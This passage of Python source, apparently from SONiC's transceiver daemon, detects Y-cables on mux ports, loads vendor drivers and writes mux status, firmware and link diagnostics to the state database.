def check_identifier_presence_and_update_mux_table_entry(state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping, y_cable_presence):
    """Detect a Y-cable on *logical_port_name*, load its vendor driver and
    populate the state-DB mux tables.

    Flow: read MUX_CABLE config for the port; if its 'state' is one of
    active/auto/manual/standby, read the transceiver's manufacturer/model,
    map them through y_cable_vendor_mapping to a sonic_y_cable driver
    module, instantiate its YCable class (cached in y_cable_port_instances
    with a per-port lock), sanity-check the driver's reported vendor, and
    write the hw-mux/static/mux-info entries. Every failure path instead
    seeds 'unknown' entries via create_tables_and_insert_mux_unknown_entries.
    """
    global y_cable_port_instances
    global y_cable_port_locks
    (status, fvs) = port_tbl[asic_index].get(logical_port_name)

    if status is False:
        helper_logger.log_warning(
            "Could not retreive fieldvalue pairs for {}, inside config_db table {}".format(logical_port_name, port_tbl[asic_index].getTableName()))
        return

    else:
        # Convert list of tuples to a dictionary
        mux_table_dict = dict(fvs)
        if "state" in mux_table_dict:

            val = mux_table_dict.get("state", None)

            if val in ["active", "auto", "manual", "standby"]:

                # import the module and load the port instance
                physical_port_list = port_mapping.logical_port_name_to_physical_port_list(
                    logical_port_name)

                if len(physical_port_list) == 1:

                    physical_port = physical_port_list[0]
                    if y_cable_wrapper_get_presence(physical_port):

                        port_info_dict = y_cable_wrapper_get_transceiver_info(
                            physical_port)
                        if port_info_dict is not None:
                            vendor = port_info_dict.get('manufacturer')

                            if vendor is None:
                                helper_logger.log_warning(
                                    "Error: Unable to find Vendor name for Transceiver for Y-Cable initiation {}".format(logical_port_name))
                                create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
                                return

                            model = port_info_dict.get('model')

                            if model is None:
                                helper_logger.log_warning(
                                    "Error: Unable to find model name for Transceiver for Y-Cable initiation {}".format(logical_port_name))
                                create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
                                return

                            # Normalize vendor/model to the identifiers used
                            # by the y_cable vendor_mapping file.
                            vendor = format_mapping_identifier(vendor)
                            model = format_mapping_identifier(model)
                            module_dir = y_cable_vendor_mapping.mapping.get(vendor)

                            if module_dir is None:
                                helper_logger.log_warning(
                                    "Error: Unable to find module dir name from vendor for Y-Cable initiation {}".format(logical_port_name))
                                create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
                                return

                            module = module_dir.get(model)

                            if module is None:
                                helper_logger.log_warning(
                                    "Error: Unable to find module name from model for Y-Cable initiation {}".format(logical_port_name))
                                create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
                                return

                            # Dynamically import the vendor driver module and
                            # grab its YCable class.
                            attr_name = 'sonic_y_cable.' + module
                            try:
                                y_cable_attribute = getattr(import_module(attr_name), 'YCable')
                            except Exception as e:
                                helper_logger.log_warning("Failed to load the attr due to {}".format(repr(e)))
                                create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
                                return
                            if y_cable_attribute is None:
                                helper_logger.log_warning(
                                    "Error: Unable to import attr name for Y-Cable initiation {}".format(logical_port_name))
                                create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
                                return

                            # Cache the driver instance and create its lock
                            # used to serialize vendor API calls.
                            y_cable_port_instances[physical_port] = y_cable_attribute(physical_port, helper_logger)
                            y_cable_port_locks[physical_port] = threading.Lock()
                            with y_cable_port_locks[physical_port]:
                                try:
                                    vendor_name_api = y_cable_port_instances.get(physical_port).get_vendor()
                                except Exception as e:
                                    helper_logger.log_warning("Failed to call the get_vendor API for port {} due to {}".format(physical_port,repr(e)))
                                    create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
                                    return

                            # Sanity check: the driver must agree with the
                            # EEPROM vendor, otherwise discard the instance.
                            if format_mapping_identifier(vendor_name_api) != vendor:
                                y_cable_port_instances.pop(physical_port)
                                y_cable_port_locks.pop(physical_port)
                                create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
                                helper_logger.log_warning("Error: Y Cable api does not work for {}, {} actual vendor name {}".format(
                                    logical_port_name, vendor_name_api, vendor))
                                return

                            y_cable_asic_table = y_cable_tbl.get(
                                asic_index, None)
                            mux_asic_table = mux_tbl.get(asic_index, None)
                            static_mux_asic_table = static_tbl.get(
                                asic_index, None)
                            if y_cable_presence[0] is True and y_cable_asic_table is not None and mux_asic_table is not None and static_mux_asic_table is not None:
                                # fill in the newly found entry
                                read_y_cable_and_update_statedb_port_tbl(
                                    logical_port_name, port_mapping, y_cable_tbl[asic_index])
                                post_port_mux_info_to_db(
                                    logical_port_name, port_mapping, mux_tbl[asic_index])
                                post_port_mux_static_info_to_db(
                                    logical_port_name, port_mapping, static_tbl[asic_index])

                            else:
                                # first create the state db y cable table and then fill in the entry
                                y_cable_presence[:] = [True]
                                namespaces = multi_asic.get_front_end_namespaces()
                                for namespace in namespaces:
                                    asic_id = multi_asic.get_asic_index_from_namespace(
                                        namespace)
                                    state_db[asic_id] = daemon_base.db_connect(
                                        "STATE_DB", namespace)
                                    y_cable_tbl[asic_id] = swsscommon.Table(
                                        state_db[asic_id], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
                                    static_tbl[asic_id] = swsscommon.Table(
                                        state_db[asic_id], MUX_CABLE_STATIC_INFO_TABLE)
                                    mux_tbl[asic_id] = swsscommon.Table(
                                        state_db[asic_id], MUX_CABLE_INFO_TABLE)
                                # fill the newly found entry
                                read_y_cable_and_update_statedb_port_tbl(
                                    logical_port_name, port_mapping, y_cable_tbl[asic_index])
                                post_port_mux_info_to_db(
                                    logical_port_name, port_mapping, mux_tbl[asic_index])
                                post_port_mux_static_info_to_db(
                                    logical_port_name, port_mapping, static_tbl[asic_index])
                        else:
                            helper_logger.log_warning(
                                "Error: Could not get transceiver info dict Y cable port {} while inserting entries".format(logical_port_name))
                            create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
                    else:
                        helper_logger.log_warning(
                            "Error: Could not establish transceiver presence for a Y cable port {} while inserting entries".format(logical_port_name))
                        create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
                else:
                    helper_logger.log_warning(
                        "Error: Retreived multiple ports for a Y cable port {} while inserting entries".format(logical_port_name))
                    create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping)
            else:
                helper_logger.log_warning(
                    "Could not retreive active or auto value for state kvp for {}, inside MUX_CABLE table".format(logical_port_name))
        else:
            helper_logger.log_warning(
                "Could not retreive state value inside mux_info_dict for {}, inside MUX_CABLE table".format(logical_port_name))
def check_identifier_presence_and_delete_mux_table_entry(state_db, port_tbl, asic_index, logical_port_name, y_cable_presence, port_mapping, delete_change_event):
    """Remove a departed Y-cable's state-DB entries and cached driver.

    Deletes the port's rows from the hw-mux, static-info and mux-info
    tables, pops the cached driver instance/lock, and flags
    *delete_change_event* so the caller can re-evaluate overall Y-cable
    presence. No-op when no Y-cable was ever detected.
    """
    y_cable_tbl = {}
    static_tbl, mux_tbl = {}, {}

    # if there is No Y cable do not do anything here
    if y_cable_presence[0] is False:
        return

    (status, fvs) = port_tbl[asic_index].get(logical_port_name)
    if status is False:
        helper_logger.log_warning(
            "Could not retreive fieldvalue pairs for {}, inside config_db table {}".format(logical_port_name, port_tbl[asic_index].getTableName()))
        return
    else:
        # Convert list of tuples to a dictionary
        mux_table_dict = dict(fvs)
        if "state" in mux_table_dict:
            if y_cable_presence[0] is True:
                # delete this entry in the y cable table found and update the delete event
                namespaces = multi_asic.get_front_end_namespaces()
                for namespace in namespaces:
                    asic_id = multi_asic.get_asic_index_from_namespace(namespace)
                    state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
                    y_cable_tbl[asic_id] = swsscommon.Table(state_db[asic_id], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
                    static_tbl[asic_id] = swsscommon.Table(state_db[asic_id], MUX_CABLE_STATIC_INFO_TABLE)
                    mux_tbl[asic_id] = swsscommon.Table(state_db[asic_id], MUX_CABLE_INFO_TABLE)
                # fill the newly found entry
                delete_port_from_y_cable_table(logical_port_name, y_cable_tbl[asic_index])
                delete_port_from_y_cable_table(logical_port_name, static_tbl[asic_index])
                delete_port_from_y_cable_table(logical_port_name, mux_tbl[asic_index])
                delete_change_event[:] = [True]
                # delete the y_cable instance
                physical_port_list = port_mapping.logical_port_name_to_physical_port_list(logical_port_name)

                if len(physical_port_list) == 1:
                    physical_port = physical_port_list[0]
                    # NOTE(review): these pops raise KeyError if the instance
                    # was never cached — confirm callers guarantee insertion.
                    y_cable_port_instances.pop(physical_port)
                    y_cable_port_locks.pop(physical_port)
                else:
                    helper_logger.log_warning(
                        "Error: Retreived multiple ports for a Y cable port {} while delete entries".format(logical_port_name))
def init_ports_status_for_y_cable(platform_sfp, platform_chassis, y_cable_presence, port_mapping, stop_event=None):
    """Detect Y-cables on all configured mux ports and seed their state-DB
    entries.

    Args:
        platform_sfp: sfputil object stored into y_cable_platform_sfputil.
        platform_chassis: chassis object stored into y_cable_platform_chassis.
        y_cable_presence: single-element list updated in place by the
            per-port helper when a Y-cable is found.
        port_mapping: logical/physical port mapping helper.
        stop_event: optional threading.Event checked between ports to allow
            early shutdown; a fresh never-set event is created when omitted.
    """
    global y_cable_platform_sfputil
    global y_cable_platform_chassis
    global y_cable_port_instances

    # BUGFIX: the previous default `stop_event=threading.Event()` created one
    # shared Event at definition time (mutable-default pitfall); create a
    # fresh one per call instead — observable behavior is unchanged.
    if stop_event is None:
        stop_event = threading.Event()

    # Connect to CONFIG_DB and create port status table inside state_db
    config_db, state_db, port_tbl, y_cable_tbl = {}, {}, {}, {}
    static_tbl, mux_tbl = {}, {}
    port_table_keys = {}
    xcvrd_log_tbl = {}

    y_cable_platform_sfputil = platform_sfp
    y_cable_platform_chassis = platform_chassis

    fvs_updated = swsscommon.FieldValuePairs([('log_verbosity', 'notice')])
    # Get the namespaces in the platform
    namespaces = multi_asic.get_front_end_namespaces()
    for namespace in namespaces:
        asic_id = multi_asic.get_asic_index_from_namespace(namespace)
        config_db[asic_id] = daemon_base.db_connect("CONFIG_DB", namespace)
        port_tbl[asic_id] = swsscommon.Table(config_db[asic_id], "MUX_CABLE")
        port_table_keys[asic_id] = port_tbl[asic_id].getKeys()
        xcvrd_log_tbl[asic_id] = swsscommon.Table(config_db[asic_id], "XCVRD_LOG")
        xcvrd_log_tbl[asic_id].set("Y_CABLE", fvs_updated)

    # Init PORT_STATUS table if ports are on Y cable
    logical_port_list = port_mapping.logical_port_list
    for logical_port_name in logical_port_list:
        if stop_event.is_set():
            break

        # Get the asic to which this port belongs
        asic_index = port_mapping.get_asic_id_for_logical_port(
            logical_port_name)
        if asic_index is None:
            helper_logger.log_warning(
                "Got invalid asic index for {}, ignored".format(logical_port_name))
            continue

        if logical_port_name in port_table_keys[asic_index]:
            check_identifier_presence_and_update_mux_table_entry(
                state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping, y_cable_presence)
        else:
            # This port does not exist in Port table of config but is present inside
            # logical_ports after loading the port_mappings from port_config_file
            # This should not happen
            helper_logger.log_warning(
                "Could not retreive port inside config_db PORT table {} for Y-Cable initiation".format(logical_port_name))
def change_ports_status_for_y_cable_change_event(logical_port_dict, port_mapping, y_cable_presence, stop_event=threading.Event()):
    """React to SFP insert/remove events on mux-cable ports.

    For each (logical_port, event value): an insert triggers Y-cable
    detection and table population; a removal (or an error-bitmap event
    that blocks EEPROM reads) deletes the port's mux entries. After any
    deletion, Y-cable presence is recomputed from the remaining hw-mux
    table keys.

    NOTE(review): the `stop_event=threading.Event()` default is created
    once at definition time and is never read in this body — confirm
    whether it is part of the external interface before removing.
    """
    # Connect to CONFIG_DB and create port status table inside state_db
    config_db, state_db, port_tbl, y_cable_tbl = {}, {}, {}, {}
    static_tbl, mux_tbl = {}, {}
    port_table_keys = {}
    delete_change_event = [False]

    # Get the namespaces in the platform
    namespaces = multi_asic.get_front_end_namespaces()

    # Get the keys from PORT table inside config db to prepare check for mux_cable identifier
    for namespace in namespaces:
        asic_id = multi_asic.get_asic_index_from_namespace(namespace)
        config_db[asic_id] = daemon_base.db_connect("CONFIG_DB", namespace)
        port_tbl[asic_id] = swsscommon.Table(config_db[asic_id], "MUX_CABLE")
        port_table_keys[asic_id] = port_tbl[asic_id].getKeys()

    # Init PORT_STATUS table if ports are on Y cable and an event is received
    for logical_port_name, value in logical_port_dict.items():
        # Get the asic to which this port belongs
        asic_index = port_mapping.get_asic_id_for_logical_port(logical_port_name)
        if asic_index is None:
            helper_logger.log_warning(
                "Got invalid asic index for {}, ignored".format(logical_port_name))
            continue

        if logical_port_name in port_table_keys[asic_index]:
            if value == sfp_status_helper.SFP_STATUS_INSERTED:
                helper_logger.log_info("Got SFP inserted event")
                check_identifier_presence_and_update_mux_table_entry(
                    state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping, y_cable_presence)
            elif value == sfp_status_helper.SFP_STATUS_REMOVED:
                check_identifier_presence_and_delete_mux_table_entry(
                    state_db, port_tbl, asic_index, logical_port_name, y_cable_presence, port_mapping, delete_change_event)
            else:
                try:
                    # Now that the value is in bitmap format, let's convert it to number
                    event_bits = int(value)
                    if sfp_status_helper.is_error_block_eeprom_reading(event_bits):
                        check_identifier_presence_and_delete_mux_table_entry(
                            state_db, port_tbl, asic_index, logical_port_name, y_cable_presence, port_mapping, delete_change_event)
                except:
                    # NOTE(review): bare except silently swallows everything,
                    # including KeyboardInterrupt — consider narrowing to
                    # `except Exception`.
                    pass

                # SFP return unkown event, just ignore for now.
                helper_logger.log_warning("Got unknown event {}, ignored".format(value))
                continue

    # If there was a delete event and y_cable_presence was true, reaccess the y_cable presence
    if y_cable_presence[0] is True and delete_change_event[0] is True:

        y_cable_presence[:] = [False]
        for namespace in namespaces:
            asic_id = multi_asic.get_asic_index_from_namespace(
                namespace)
            y_cable_tbl[asic_id] = swsscommon.Table(
                state_db[asic_id], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
            y_cable_table_size = len(y_cable_tbl[asic_id].getKeys())
            if y_cable_table_size > 0:
                y_cable_presence[:] = [True]
                break
def delete_ports_status_for_y_cable(port_mapping):
    """Remove every Y-cable port's state-DB entries and cached driver
    instances (used during daemon teardown).

    Args:
        port_mapping: logical/physical port mapping helper providing
            logical_port_list and asic/physical lookups.
    """
    state_db, config_db, port_tbl, y_cable_tbl = {}, {}, {}, {}
    y_cable_tbl_keys = {}
    static_tbl, mux_tbl = {}, {}
    namespaces = multi_asic.get_front_end_namespaces()
    for namespace in namespaces:
        asic_id = multi_asic.get_asic_index_from_namespace(namespace)
        config_db[asic_id] = daemon_base.db_connect("CONFIG_DB", namespace)
        state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
        y_cable_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
        y_cable_tbl_keys[asic_id] = y_cable_tbl[asic_id].getKeys()
        static_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], MUX_CABLE_STATIC_INFO_TABLE)
        mux_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], MUX_CABLE_INFO_TABLE)
        port_tbl[asic_id] = swsscommon.Table(config_db[asic_id], "MUX_CABLE")

    # delete PORTS on Y cable table if ports on Y cable
    logical_port_list = port_mapping.logical_port_list
    for logical_port_name in logical_port_list:

        # Get the asic to which this port belongs
        asic_index = port_mapping.get_asic_id_for_logical_port(
            logical_port_name)
        if asic_index is None:
            helper_logger.log_warning(
                "Got invalid asic index for {}, ignored".format(logical_port_name))
            # BUGFIX: previously fell through and indexed
            # y_cable_tbl_keys[None] below, raising KeyError; skip the
            # port instead (matches init_ports_status_for_y_cable).
            continue

        if logical_port_name in y_cable_tbl_keys[asic_index]:
            delete_port_from_y_cable_table(logical_port_name, y_cable_tbl[asic_index])
            delete_port_from_y_cable_table(logical_port_name, static_tbl[asic_index])
            delete_port_from_y_cable_table(logical_port_name, mux_tbl[asic_index])
            # delete the y_cable port instance
            physical_port_list = port_mapping.logical_port_name_to_physical_port_list(logical_port_name)

            if len(physical_port_list) == 1:
                physical_port = physical_port_list[0]
                if y_cable_port_instances.get(physical_port) is not None:
                    y_cable_port_instances.pop(physical_port)
                    y_cable_port_locks.pop(physical_port)
            else:
                helper_logger.log_warning(
                    "Error: Retreived multiple ports for a Y cable port {} while deleting entries".format(logical_port_name))
def check_identifier_presence_and_update_mux_info_entry(state_db, mux_tbl, asic_index, logical_port_name, port_mapping):
    """Refresh the MUX_CABLE_INFO state-DB entry for *logical_port_name*.

    Looks the port up in the CONFIG_DB MUX_CABLE table; if it is configured
    with a recognized mux "state" value, (re)posts its mux info to the
    per-ASIC state-DB table, creating the table handle first if needed.
    """
    # Build per-namespace CONFIG_DB handles for the MUX_CABLE table
    config_db, port_tbl = {}, {}
    for ns in multi_asic.get_front_end_namespaces():
        ns_asic_id = multi_asic.get_asic_index_from_namespace(ns)
        config_db[ns_asic_id] = daemon_base.db_connect("CONFIG_DB", ns)
        port_tbl[ns_asic_id] = swsscommon.Table(config_db[ns_asic_id], "MUX_CABLE")
    status, fvs = port_tbl[asic_index].get(logical_port_name)
    if status is False:
        helper_logger.log_debug("Could not retreive fieldvalue pairs for {}, inside config_db table {}".format(logical_port_name, port_tbl[asic_index].getTableName()))
        return
    # Convert list of tuples to a dictionary
    mux_table_dict = dict(fvs)
    if "state" not in mux_table_dict:
        return
    state_val = mux_table_dict.get("state", None)
    if state_val not in ("active", "auto", "manual", "standby"):
        helper_logger.log_warning(
            "Could not retreive active or auto value for state kvp for {}, inside MUX_CABLE table".format(logical_port_name))
        return
    if mux_tbl.get(asic_index, None) is None:
        # first create the state db y cable table and then fill in the entry
        for ns in multi_asic.get_front_end_namespaces():
            ns_asic_id = multi_asic.get_asic_index_from_namespace(ns)
            mux_tbl[ns_asic_id] = swsscommon.Table(state_db[ns_asic_id], MUX_CABLE_INFO_TABLE)
    # fill in the (possibly newly created) entry
    post_port_mux_info_to_db(logical_port_name, port_mapping, mux_tbl[asic_index])
def get_firmware_dict(physical_port, port_instance, target, side, mux_info_dict, logical_port_name):
    """Fill version_{side}_{active,inactive,next} keys of *mux_info_dict*.

    Normally reads the firmware versions from the transceiver for the given
    MCU *target* under the per-port lock. While a firmware download is in
    progress, the last values cached in the state DB are reported instead of
    touching the hardware. A previously failed download is logged, then the
    normal hardware read is attempted anyway.
    """
    fw_status = port_instance.download_firmware_status
    if fw_status == port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS:
        # if there is a firmware download in progress, retreive the last known firmware
        state_db, mux_tbl = {}, {}
        for namespace in multi_asic.get_front_end_namespaces():
            asic_id = multi_asic.get_asic_index_from_namespace(namespace)
            state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
            mux_tbl[asic_id] = swsscommon.Table(
                state_db[asic_id], MUX_CABLE_INFO_TABLE)
        asic_index = y_cable_platform_sfputil.get_asic_id_for_logical_port(
            logical_port_name)
        status, fvs = mux_tbl[asic_index].get(logical_port_name)
        if status is False:
            helper_logger.log_warning("Could not retreive fieldvalue pairs for {}, inside state_db table {}".format(logical_port_name, mux_tbl[asic_index].getTableName()))
            for suffix in ("active", "inactive", "next"):
                mux_info_dict["version_{}_{}".format(side, suffix)] = "N/A"
            return
        mux_firmware_dict = dict(fvs)
        for suffix in ("active", "inactive", "next"):
            key = "version_{}_{}".format(side, suffix)
            mux_info_dict[key] = mux_firmware_dict.get(key, None)
        helper_logger.log_warning(
            "trying to get/post firmware info while download in progress returning with last known firmware without execute {}".format(physical_port))
        return
    if fw_status == port_instance.FIRMWARE_DOWNLOAD_STATUS_FAILED:
        # if there is a firmware download failed, retreive the current MCU's firmware with a log message
        helper_logger.log_error(
            "Firmware Download API failed in the previous run, firmware download status was set to failed;retry required {}".format(physical_port))
    fw_versions = None
    with y_cable_port_locks[physical_port]:
        try:
            fw_versions = port_instance.get_firmware_version(target)
        except Exception as e:
            fw_versions = None
            helper_logger.log_warning("Failed to execute the get_firmware_version API for port {} side {} due to {}".format(physical_port,side,repr(e)))
    if isinstance(fw_versions, dict):
        mux_info_dict[("version_{}_active".format(side))] = fw_versions.get("version_active", None)
        mux_info_dict[("version_{}_inactive".format(side))] = fw_versions.get("version_inactive", None)
        mux_info_dict[("version_{}_next".format(side))] = fw_versions.get("version_next", None)
    else:
        for suffix in ("active", "inactive", "next"):
            mux_info_dict["version_{}_{}".format(side, suffix)] = "N/A"
def get_muxcable_info(physical_port, logical_port_name, port_mapping):
    """Collect live mux-cable diagnostics for one Y-cable port.

    Queries the cached transceiver instance (each hardware access taken
    under the per-port lock) for active side, mux direction, switch
    counters, eye heights, link states, firmware versions and
    temperature/voltage readings, and returns them as a flat dict whose
    keys match the MUX_CABLE_INFO state-DB field names.

    Returns:
        dict of field name -> value, or -1 when the port instance or its
        HW_MUX_CABLE state-DB entry cannot be retrieved.
    """
    mux_info_dict = {}
    y_cable_tbl, state_db = {}, {}
    port_instance = y_cable_port_instances.get(physical_port)
    if port_instance is None:
        helper_logger.log_error("Error: Could not get port instance for muxcable info for Y cable port {}".format(logical_port_name))
        return -1
    # One STATE_DB connection/table handle per front-end namespace
    namespaces = multi_asic.get_front_end_namespaces()
    for namespace in namespaces:
        asic_id = multi_asic.get_asic_index_from_namespace(namespace)
        state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
        y_cable_tbl[asic_id] = swsscommon.Table(state_db[asic_id], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
    asic_index = port_mapping.get_asic_id_for_logical_port(
        logical_port_name)
    if asic_index is None:
        helper_logger.log_warning("Got invalid asic index for {}, ignored".format(logical_port_name))
        return -1
    (status, fvs) = y_cable_tbl[asic_index].get(logical_port_name)
    if status is False:
        helper_logger.log_warning("Could not retreive fieldvalue pairs for {}, inside state_db table {}".format(logical_port_name, y_cable_tbl[asic_index].getTableName()))
        return -1
    mux_port_dict = dict(fvs)
    read_side = int(mux_port_dict.get("read_side"))
    active_side = None
    with y_cable_port_locks[physical_port]:
        try:
            active_side = port_instance.get_active_linked_tor_side()
        except Exception as e:
            helper_logger.log_warning("Failed to execute the get_active_side API for port {} due to {}".format(physical_port,repr(e)))
    # active_side values 1/2 identify a ToR; None/EEPROM_ERROR/negative mean unknown
    if active_side is None or active_side == port_instance.EEPROM_ERROR or active_side < 0:
        tor_active = 'unknown'
    elif read_side == active_side and (active_side == 1 or active_side == 2):
        tor_active = 'active'
    elif read_side != active_side and (active_side == 1 or active_side == 2):
        tor_active = 'standby'
    else:
        tor_active = 'unknown'
    mux_info_dict["tor_active"] = tor_active
    mux_dir_val = None
    with y_cable_port_locks[physical_port]:
        try:
            mux_dir_val = port_instance.get_mux_direction()
        except Exception as e:
            helper_logger.log_warning("Failed to execute the get_mux_direction API for port {} due to {}".format(physical_port,repr(e)))
    if mux_dir_val is None or mux_dir_val == port_instance.EEPROM_ERROR or mux_dir_val < 0 or read_side == -1:
        mux_direction = 'unknown'
    else:
        if read_side == mux_dir_val:
            mux_direction = 'self'
        else:
            mux_direction = 'peer'
    mux_info_dict["mux_direction"] = mux_direction
    with y_cable_port_locks[physical_port]:
        try:
            manual_switch_cnt = port_instance.get_switch_count_total(port_instance.SWITCH_COUNT_MANUAL)
            auto_switch_cnt = port_instance.get_switch_count_total(port_instance.SWITCH_COUNT_AUTO)
        except Exception as e:
            manual_switch_cnt = None
            auto_switch_cnt = None
            helper_logger.log_warning("Failed to execute the get_switch_cnt API for port {} due to {}".format(physical_port,repr(e)))
    if manual_switch_cnt is None or manual_switch_cnt == port_instance.EEPROM_ERROR or manual_switch_cnt < 0:
        mux_info_dict["manual_switch_count"] = "N/A"
    else:
        mux_info_dict["manual_switch_count"] = manual_switch_cnt
    if auto_switch_cnt is None or auto_switch_cnt == port_instance.EEPROM_ERROR or auto_switch_cnt < 0:
        mux_info_dict["auto_switch_count"] = "N/A"
    else:
        mux_info_dict["auto_switch_count"] = auto_switch_cnt
    # read_side == 1 means this ToR is TARGET_TOR_A and the peer is TARGET_TOR_B;
    # otherwise the mapping is reversed
    if read_side == 1:
        with y_cable_port_locks[physical_port]:
            try:
                eye_result_self = port_instance.get_eye_heights(port_instance.TARGET_TOR_A)
                eye_result_peer = port_instance.get_eye_heights(port_instance.TARGET_TOR_B)
            except Exception as e:
                eye_result_self = None
                eye_result_peer = None
                helper_logger.log_warning("Failed to execute the get_eye_heights API for port {} due to {}".format(physical_port,repr(e)))
    else:
        with y_cable_port_locks[physical_port]:
            try:
                eye_result_self = port_instance.get_eye_heights(port_instance.TARGET_TOR_B)
                eye_result_peer = port_instance.get_eye_heights(port_instance.TARGET_TOR_A)
            except Exception as e:
                eye_result_self = None
                eye_result_peer = None
                helper_logger.log_warning("Failed to execute the get_eye_heights API for port {} due to {}".format(physical_port,repr(e)))
    with y_cable_port_locks[physical_port]:
        try:
            eye_result_nic = port_instance.get_eye_heights(port_instance.TARGET_NIC)
        except Exception as e:
            eye_result_nic = None
            helper_logger.log_warning("Failed to execute the get_eye_heights nic side API for port {} due to {}".format(physical_port,repr(e)))
    if eye_result_self is not None and eye_result_self is not port_instance.EEPROM_ERROR and isinstance(eye_result_self, list):
        mux_info_dict["self_eye_height_lane1"] = eye_result_self[0]
        mux_info_dict["self_eye_height_lane2"] = eye_result_self[1]
    else:
        mux_info_dict["self_eye_height_lane1"] = "N/A"
        mux_info_dict["self_eye_height_lane2"] = "N/A"
    if eye_result_peer is not None and eye_result_peer is not port_instance.EEPROM_ERROR and isinstance(eye_result_peer, list):
        mux_info_dict["peer_eye_height_lane1"] = eye_result_peer[0]
        mux_info_dict["peer_eye_height_lane2"] = eye_result_peer[1]
    else:
        mux_info_dict["peer_eye_height_lane1"] = "N/A"
        mux_info_dict["peer_eye_height_lane2"] = "N/A"
    if eye_result_nic is not None and eye_result_nic is not port_instance.EEPROM_ERROR and isinstance(eye_result_nic, list):
        mux_info_dict["nic_eye_height_lane1"] = eye_result_nic[0]
        mux_info_dict["nic_eye_height_lane2"] = eye_result_nic[1]
    else:
        mux_info_dict["nic_eye_height_lane1"] = "N/A"
        mux_info_dict["nic_eye_height_lane2"] = "N/A"
    if read_side == 1:
        with y_cable_port_locks[physical_port]:
            try:
                link_state_tor_a = port_instance.is_link_active(port_instance.TARGET_TOR_A)
            except Exception as e:
                link_state_tor_a = False
                helper_logger.log_warning("Failed to execute the is_link_active TOR A side API for port {} due to {}".format(physical_port,repr(e)))
        if link_state_tor_a:
            mux_info_dict["link_status_self"] = "up"
        else:
            mux_info_dict["link_status_self"] = "down"
        with y_cable_port_locks[physical_port]:
            try:
                link_state_tor_b = port_instance.is_link_active(port_instance.TARGET_TOR_B)
            except Exception as e:
                link_state_tor_b = False
                helper_logger.log_warning("Failed to execute the is_link_active TOR B side API for port {} due to {}".format(physical_port,repr(e)))
        if link_state_tor_b:
            mux_info_dict["link_status_peer"] = "up"
        else:
            mux_info_dict["link_status_peer"] = "down"
    else:
        with y_cable_port_locks[physical_port]:
            try:
                link_state_tor_b = port_instance.is_link_active(port_instance.TARGET_TOR_B)
            except Exception as e:
                link_state_tor_b = False
                helper_logger.log_warning("Failed to execute the is_link_active TOR B side API for port {} due to {}".format(physical_port,repr(e)))
        if link_state_tor_b:
            mux_info_dict["link_status_self"] = "up"
        else:
            mux_info_dict["link_status_self"] = "down"
        with y_cable_port_locks[physical_port]:
            try:
                link_state_tor_a = port_instance.is_link_active(port_instance.TARGET_TOR_A)
            except Exception as e:
                link_state_tor_a = False
                helper_logger.log_warning("Failed to execute the is_link_active TOR A side API for port {} due to {}".format(physical_port,repr(e)))
        if link_state_tor_a:
            mux_info_dict["link_status_peer"] = "up"
        else:
            mux_info_dict["link_status_peer"] = "down"
    # NOTE(review): unlike every other hardware call above, the NIC-side
    # is_link_active call is not wrapped in try/except — an exception here
    # propagates to the caller; confirm whether that is intended
    with y_cable_port_locks[physical_port]:
        if port_instance.is_link_active(port_instance.TARGET_NIC):
            mux_info_dict["link_status_nic"] = "up"
        else:
            mux_info_dict["link_status_nic"] = "down"
    get_firmware_dict(physical_port, port_instance, port_instance.TARGET_NIC, "nic", mux_info_dict, logical_port_name)
    if read_side == 1:
        get_firmware_dict(physical_port, port_instance, port_instance.TARGET_TOR_A, "self", mux_info_dict, logical_port_name)
        get_firmware_dict(physical_port, port_instance, port_instance.TARGET_TOR_B, "peer", mux_info_dict, logical_port_name)
    else:
        get_firmware_dict(physical_port, port_instance, port_instance.TARGET_TOR_A, "peer", mux_info_dict, logical_port_name)
        get_firmware_dict(physical_port, port_instance, port_instance.TARGET_TOR_B, "self", mux_info_dict, logical_port_name)
    with y_cable_port_locks[physical_port]:
        try:
            res = port_instance.get_local_temperature()
        except Exception as e:
            res = None
            helper_logger.log_warning("Failed to execute the get_local_temperature for port {} due to {}".format(physical_port,repr(e)))
    if res is not None and res is not port_instance.EEPROM_ERROR and isinstance(res, int) and res >= 0:
        mux_info_dict["internal_temperature"] = res
    else:
